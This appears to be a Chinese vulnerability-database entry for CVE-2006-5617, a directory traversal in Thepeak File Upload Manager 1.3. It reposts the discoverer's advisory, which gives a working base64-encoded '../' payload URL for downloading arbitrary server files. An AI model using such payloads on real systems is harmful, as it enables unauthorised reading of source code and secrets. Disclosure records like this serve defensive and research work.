Thepeak File Upload Manager 'index.php'目录遍历漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1193021 漏洞类型 路径遍历
发布时间 2006-10-30 更新时间 2006-11-02
CVE编号 CVE-2006-5617 CNNVD-ID CNNVD-200610-519
漏洞平台 N/A CVSS评分 7.5
|漏洞来源
https://cxsecurity.com/issue/WLB-2006110001
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200610-519
|漏洞详情
ThepeakFileUploadManager1.3的index.php中存在目录遍历漏洞,远程攻击者可以通过64位编码的文件路径(在file参数中包含..(点点))读取或下载任意文件。
|漏洞EXP
Thepeak File Upload v1.3 : Read file vulneability
Discovered By: Phạm Đức Hải (Pham Duc Hai)
Email: duchaikhtn (at) gmail (dot) com
YIM : kiki_coco1985vn
Website: http://blog.ajaxviet.com
-------------------------
Description:
file upload manager 1.3
written by thepeak (adam medici)
copyright (c) 2003 thepeak of mtnpeak.net
A simple, powerful tool to upload and manage files using your web browser.

There are some bugs in Thepeak File Upload v1.3 :
http://www.securityfocus.com/archive/1/378494
Today, I find out a bug in Thepeak File Upload v1.3 , this bug allows attacker
can download source file(.php,...) from server.
-------------------------
Exploit :
http://somesite.com/example/index.php --> upload form
Now, we upload one file to server, ex : test.jpg -->ok
We have its url to view it : http://somesite.com/example/index.php?act=view&file=dGVzdC5qcGc=
anh url to download it : http://somesite.com/example/index.php?act=dl&file=dGVzdC5qcGc=
Notice that the value "dGVzdC5qcGc=" of parameter file is encoded 64 of " test.jpg"
We need get source file http://somesite.com/index.php.
Encode 64 path to index.php above : ../index.php --> Li4vaW5kZXgucGhw
==> we have the link to download source file index.php (notice act=dl)

http://somesite.com/example/index.php?act=dl&file=Li4vaW5kZXgucGhw

You can also download other files.
Have fun!
|参考资料

来源:BID
名称:20760
链接:http://www.securityfocus.com/bid/20760
来源:BUGTRAQ
名称:20061026ThepeakFileUploadv1.3:Readfilevulneability
链接:http://www.securityfocus.com/archive/1/archive/1/449936/100/0/threaded
来源:SREASON
名称:1798
链接:http://securityreason.com/securityalert/1798